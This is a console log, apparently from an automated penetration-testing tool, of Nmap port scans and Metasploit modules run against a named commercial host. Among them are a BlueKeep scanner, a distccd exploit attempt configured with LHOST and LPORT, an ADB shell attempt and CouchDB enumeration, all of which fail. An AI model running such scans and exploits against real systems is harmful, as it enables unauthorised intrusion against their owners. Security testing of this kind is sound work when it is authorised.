No exact OS matches for host (test conditions non-ideal).
Uptime guess: 4.845 days (since Wed Feb 16 18:57:10 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 3310/tcp)
HOP RTT ADDRESS
1 106.70 ms 151.101.194.137
NSE: Script Post-scanning.
Initiating NSE at 15:13
Completed NSE at 15:13, 0.00s elapsed
Initiating NSE at 15:13
Completed NSE at 15:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.70 seconds
Raw packets sent: 67 (6.368KB) | Rcvd: 46 (3.164KB)
+ -- --=[Port 3128 opened... running tests...
====================================================================================•x[2022-02-21](15:13)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](15:13)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:13 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:13
Completed NSE at 15:13, 0.00s elapsed
Initiating NSE at 15:13
Completed NSE at 15:13, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:13
Completed Parallel DNS resolution of 1 host. at 15:13, 0.12s elapsed
Initiating SYN Stealth Scan at 15:13
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 3128/tcp on 151.101.130.137
Completed SYN Stealth Scan at 15:13, 0.12s elapsed (1 total ports)
Initiating Service scan at 15:13
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 15:16, 175.08s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 15:16
Completed Traceroute at 15:16, 0.15s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:16
Completed Parallel DNS resolution of 1 host. at 15:16, 0.20s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 15:16
Completed NSE at 15:17, 30.30s elapsed
Initiating NSE at 15:17
Completed NSE at 15:17, 1.26s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.13s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649
PORT STATE SERVICE VERSION
3128/tcp open squid-http?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 (89%), Linux 5.0 - 5.3 (89%), Linux 5.4 (89%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 27.511 days (since Tue Jan 25 03:01:21 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 3128/tcp)
HOP RTT ADDRESS
1 145.56 ms 151.101.130.137
NSE: Script Post-scanning.
Initiating NSE at 15:17
Completed NSE at 15:17, 0.00s elapsed
Initiating NSE at 15:17
Completed NSE at 15:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 212.53 seconds
Raw packets sent: 67 (6.368KB) | Rcvd: 53 (3.744KB)
+ -- --=[Port 3389 opened... running tests...
====================================================================================•x[2022-02-21](15:17)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](15:17)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:17 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:17
Completed NSE at 15:17, 0.00s elapsed
Initiating NSE at 15:17
Completed NSE at 15:17, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:17
Completed Parallel DNS resolution of 1 host. at 15:17, 0.09s elapsed
Initiating SYN Stealth Scan at 15:17
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Discovered open port 3389/tcp on 151.101.2.137
Completed SYN Stealth Scan at 15:17, 0.16s elapsed (1 total ports)
Initiating Service scan at 15:17
Scanning 1 service on guestmob.myspreadshop.com (151.101.2.137)
Completed Service scan at 15:20, 160.86s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.2.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.2.137)
Initiating Traceroute at 15:20
Completed Traceroute at 15:20, 0.17s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:20
Completed Parallel DNS resolution of 1 host. at 15:20, 0.19s elapsed
NSE: Script scanning 151.101.2.137.
Initiating NSE at 15:20
Completed NSE at 15:20, 15.84s elapsed
Initiating NSE at 15:20
Completed NSE at 15:20, 1.11s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.18s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server?
|_rdp-enum-encryption: Received unhandled packet
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 10.865 days (since Thu Feb 10 18:35:32 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 169.34 ms 151.101.2.137
NSE: Script Post-scanning.
Initiating NSE at 15:20
Completed NSE at 15:20, 0.00s elapsed
Initiating NSE at 15:20
Completed NSE at 15:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.45 seconds
Raw packets sent: 68 (6.420KB) | Rcvd: 55 (4.208KB)
====================================================================================•x[2022-02-21](15:20)x•
RUNNING METASPLOIT MODULES
====================================================================================•x[2022-02-21](15:20)x•
RHOSTS => guestmob.myspreadshop.com
[*] 151.101.194.137:3389 - 151.101.194.137:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 1 of 8 hosts (12% complete)
[*] 151.101.2.137:3389 - 151.101.2.137:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 2 of 8 hosts (25% complete)
[*] 151.101.66.137:3389 - 151.101.66.137:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 3 of 8 hosts (37% complete)
[*] 151.101.130.137:3389 - 151.101.130.137:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 4 of 8 hosts (50% complete)
[*] 2a04:4e42:400::649:3389 - 2a04:4e42:400::649:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 5 of 8 hosts (62% complete)
[*] 2a04:4e42:600::649:3389 - 2a04:4e42:600::649:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 6 of 8 hosts (75% complete)
[*] 2a04:4e42::649:3389 - 2a04:4e42::649:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 7 of 8 hosts (87% complete)
[*] 2a04:4e42:200::649:3389 - 2a04:4e42:200::649:3389 - Cannot reliably check exploitability.
[*] guestmob.myspreadshop.com:3389 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](15:21)x•
RUNNING KEEPBLUE CVE-2019-0708 RCE SCANNER
====================================================================================•x[2022-02-21](15:21)x•
RHOSTS => guestmob.myspreadshop.com
[*] guestmob.myspreadshop.com:3389 - Scanned 1 of 8 hosts (12% complete)
[*] guestmob.myspreadshop.com:3389 - Scanned 2 of 8 hosts (25% complete)
[*] guestmob.myspreadshop.com:3389 - Scanned 3 of 8 hosts (37% complete)
[*] guestmob.myspreadshop.com:3389 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:3389 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:3389 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:3389 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:3389 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](15:21)x•
RUNNING RDESKTOP CONNECTION
====================================================================================•x[2022-02-21](15:21)x•
modes/normal.sh: line 857: rdesktop: command not found
+ -- --=[Port 3632 opened... running tests...
====================================================================================•x[2022-02-21](15:21)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](15:21)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:21 EST
NSE: Loaded 47 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:21
Completed NSE at 15:21, 0.00s elapsed
Initiating NSE at 15:21
Completed NSE at 15:21, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:21
Completed Parallel DNS resolution of 1 host. at 15:21, 0.10s elapsed
Initiating SYN Stealth Scan at 15:21
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Discovered open port 3632/tcp on 151.101.2.137
Completed SYN Stealth Scan at 15:21, 0.16s elapsed (1 total ports)
Initiating Service scan at 15:21
Scanning 1 service on guestmob.myspreadshop.com (151.101.2.137)
Completed Service scan at 15:24, 165.70s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.2.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.2.137)
Initiating Traceroute at 15:24
Completed Traceroute at 15:24, 0.12s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:24
Completed Parallel DNS resolution of 1 host. at 15:24, 0.08s elapsed
NSE: Script scanning 151.101.2.137.
Initiating NSE at 15:24
Completed NSE at 15:24, 15.54s elapsed
Initiating NSE at 15:24
Completed NSE at 15:24, 1.18s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.13s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649
PORT STATE SERVICE VERSION
3632/tcp open distccd?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 (89%), Linux 5.0 - 5.3 (89%), Linux 5.4 (89%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 10.868 days (since Thu Feb 10 18:35:32 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 3632/tcp)
HOP RTT ADDRESS
1 119.00 ms 151.101.2.137
NSE: Script Post-scanning.
Initiating NSE at 15:24
Completed NSE at 15:24, 0.00s elapsed
Initiating NSE at 15:24
Completed NSE at 15:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 198.24 seconds
Raw packets sent: 71 (6.592KB) | Rcvd: 81 (6.914KB)
====================================================================================•x[2022-02-21](15:24)x•
RUNNING METASPLOIT MODULES
====================================================================================•x[2022-02-21](15:24)x•
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
RHOST => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[*] Exploiting target 151.101.66.137
[-] 151.101.66.137:3632 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.130.137
[-] 151.101.130.137:3632 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.194.137
[-] 151.101.194.137:3632 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.2.137
[-] 151.101.2.137:3632 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42::649
[-] 2a04:4e42::649:3632 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:200::649
[-] 2a04:4e42:200::649:3632 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:400::649
[-] 2a04:4e42:400::649:3632 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:600::649
[-] 2a04:4e42:600::649:3632 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
+ -- --=[Port 5432 closed... skipping.
+ -- --=[Port 5555 opened... running tests...
====================================================================================•x[2022-02-21](15:25)x•
CONNECTING TO ANDROID DEBUG SHELL
====================================================================================•x[2022-02-21](15:25)x•
* daemon not running; starting now at tcp:5037
* daemon started successfully
failed to connect to guestmob.myspreadshop.com:5555
error: device offline
+ -- --=[Port 5800 opened... running tests...
====================================================================================•x[2022-02-21](15:25)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](15:25)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:25 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:25
Completed NSE at 15:25, 0.00s elapsed
Initiating NSE at 15:25
Completed NSE at 15:25, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:25
Completed Parallel DNS resolution of 1 host. at 15:25, 0.09s elapsed
Initiating SYN Stealth Scan at 15:25
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Discovered open port 5800/tcp on 151.101.2.137
Completed SYN Stealth Scan at 15:25, 0.14s elapsed (1 total ports)
Initiating Service scan at 15:25
Scanning 1 service on guestmob.myspreadshop.com (151.101.2.137)
Completed Service scan at 15:28, 159.39s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.2.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.2.137)
Initiating Traceroute at 15:28
Completed Traceroute at 15:28, 0.17s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:28
Completed Parallel DNS resolution of 1 host. at 15:28, 0.08s elapsed
NSE: Script scanning 151.101.2.137.
Initiating NSE at 15:28
Completed NSE at 15:28, 24.53s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 8.26s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.15s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649
PORT STATE SERVICE VERSION
5800/tcp open vnc-http?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 (89%), Linux 5.4 (89%), Linux 5.0 - 5.4 (89%), Linux 5.0 - 5.3 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 10.870 days (since Thu Feb 10 18:35:32 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 5800/tcp)
HOP RTT ADDRESS
1 172.13 ms 151.101.2.137
NSE: Script Post-scanning.
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 198.52 seconds
Raw packets sent: 69 (6.488KB) | Rcvd: 44 (2.696KB)
+ -- --=[Port 5900 opened... running tests...
====================================================================================•x[2022-02-21](15:28)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](15:28)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:28 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating Ping Scan at 15:28
Scanning guestmob.myspreadshop.com (151.101.130.137) [4 ports]
Completed Ping Scan at 15:28, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:28
Completed Parallel DNS resolution of 1 host. at 15:28, 0.07s elapsed
Initiating SYN Stealth Scan at 15:28
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 5900/tcp on 151.101.130.137
Completed SYN Stealth Scan at 15:28, 0.11s elapsed (1 total ports)
Initiating Service scan at 15:28
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 15:31, 160.11s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 15:31
Completed Traceroute at 15:31, 0.14s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:31
Completed Parallel DNS resolution of 1 host. at 15:31, 0.09s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 15:31
Completed NSE at 15:31, 5.08s elapsed
Initiating NSE at 15:31
Completed NSE at 15:31, 5.07s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.11s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649
PORT STATE SERVICE VERSION
5900/tcp open vnc?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 (89%), Linux 5.0 - 5.3 (89%), Linux 5.4 (89%), Linux 5.0 - 5.4 (89%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 133.597 days (since Mon Oct 11 02:12:12 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 138.30 ms 151.101.130.137
NSE: Script Post-scanning.
Initiating NSE at 15:31
Completed NSE at 15:31, 0.00s elapsed
Initiating NSE at 15:31
Completed NSE at 15:31, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.55 seconds
Raw packets sent: 113 (9.190KB) | Rcvd: 79 (4.894KB)
====================================================================================•x[2022-02-21](15:31)x•
RUNNING METASPLOIT MODULES
====================================================================================•x[2022-02-21](15:31)x•
RHOSTS => guestmob.myspreadshop.com
[-] 151.101.130.137:5900 - 151.101.130.137:5900 - Handshake failed: Unable to obtain banner from server
[*] guestmob.myspreadshop.com:5900 - Scanned 1 of 8 hosts (12% complete)
[-] 151.101.194.137:5900 - 151.101.194.137:5900 - Handshake failed: Unable to obtain banner from server
[*] guestmob.myspreadshop.com:5900 - Scanned 2 of 8 hosts (25% complete)
[-] 151.101.2.137:5900 - 151.101.2.137:5900 - Handshake failed: Unable to obtain banner from server
[*] guestmob.myspreadshop.com:5900 - Scanned 3 of 8 hosts (37% complete)
[-] 151.101.66.137:5900 - 151.101.66.137:5900 - Handshake failed: Unable to obtain banner from server
[*] guestmob.myspreadshop.com:5900 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:5900 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:5900 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:5900 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:5900 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
+ -- --=[Port 5984 opened... running tests...
====================================================================================•x[2022-02-21](15:32)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](15:32)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:32 EST
NSE: Loaded 48 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:32
Completed NSE at 15:32, 0.00s elapsed
Initiating NSE at 15:32
Completed NSE at 15:32, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:32
Completed Parallel DNS resolution of 1 host. at 15:32, 0.09s elapsed
Initiating SYN Stealth Scan at 15:32
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 5984/tcp on 151.101.130.137
Completed SYN Stealth Scan at 15:32, 0.11s elapsed (1 total ports)
Initiating Service scan at 15:32
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 15:35, 158.58s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 15:35
Completed Traceroute at 15:35, 0.10s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:35
Completed Parallel DNS resolution of 1 host. at 15:35, 0.15s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 15:35
Completed NSE at 15:35, 8.09s elapsed
Initiating NSE at 15:35
Completed NSE at 15:35, 1.09s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.086s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649
PORT STATE SERVICE VERSION
5984/tcp open couchdb?
|_couchdb-stats: guestmob.myspreadshop.com did not respond with any data.
|_couchdb-databases: guestmob.myspreadshop.com did not respond with any data.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 27.524 days (since Tue Jan 25 03:01:21 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 5984/tcp)
HOP RTT ADDRESS
1 97.74 ms 151.101.130.137
NSE: Script Post-scanning.
Initiating NSE at 15:35
Completed NSE at 15:35, 0.00s elapsed
Initiating NSE at 15:35
Completed NSE at 15:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.13 seconds
Raw packets sent: 67 (6.368KB) | Rcvd: 39 (2.440KB)
====================================================================================•x[2022-02-21](15:35)x•
RUNNING METASPLOIT MODULES
====================================================================================•x[2022-02-21](15:35)x•
RHOST => guestmob.myspreadshop.com
[*] Running module against 151.101.130.137
[-] Auxiliary failed: Errno::ECONNRESET Connection reset by peer
[-] Call stack:
[-] /usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'
[-] /usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:578:in `block in read_response'
[-] /usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'
[-] /usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'
[-] /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-] /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-] /usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:567:in `read_response'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:233:in `_send_recv'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:208:in `send_recv'
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:374:in `send_request_raw'
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:430:in `send_request_cgi'
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:102:in `get_dbs'
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Running module against 151.101.194.137
[-] Auxiliary failed: Errno::ECONNRESET Connection reset by peer
[-] Call stack:
[-] /usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'
[-] /usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:578:in `block in read_response'
[-] /usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'
[-] /usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'
[-] /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-] /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-] /usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:567:in `read_response'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:233:in `_send_recv'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:208:in `send_recv'
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:374:in `send_request_raw'
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:430:in `send_request_cgi'
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:102:in `get_dbs'
[-] /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Running module against 151.101.2.137
[-] Auxiliary failed: Errno::ECONNRESET Connection reset by peer
[-] Call stack:
[-] /usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'
[-] /usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:578:in `block in read_response'
[-] /usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'
[-] /usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'
[-] /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-] /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-] /usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:567:in `read_response'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:233:in `_send_recv'
[-] /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:208:in `send_recv'
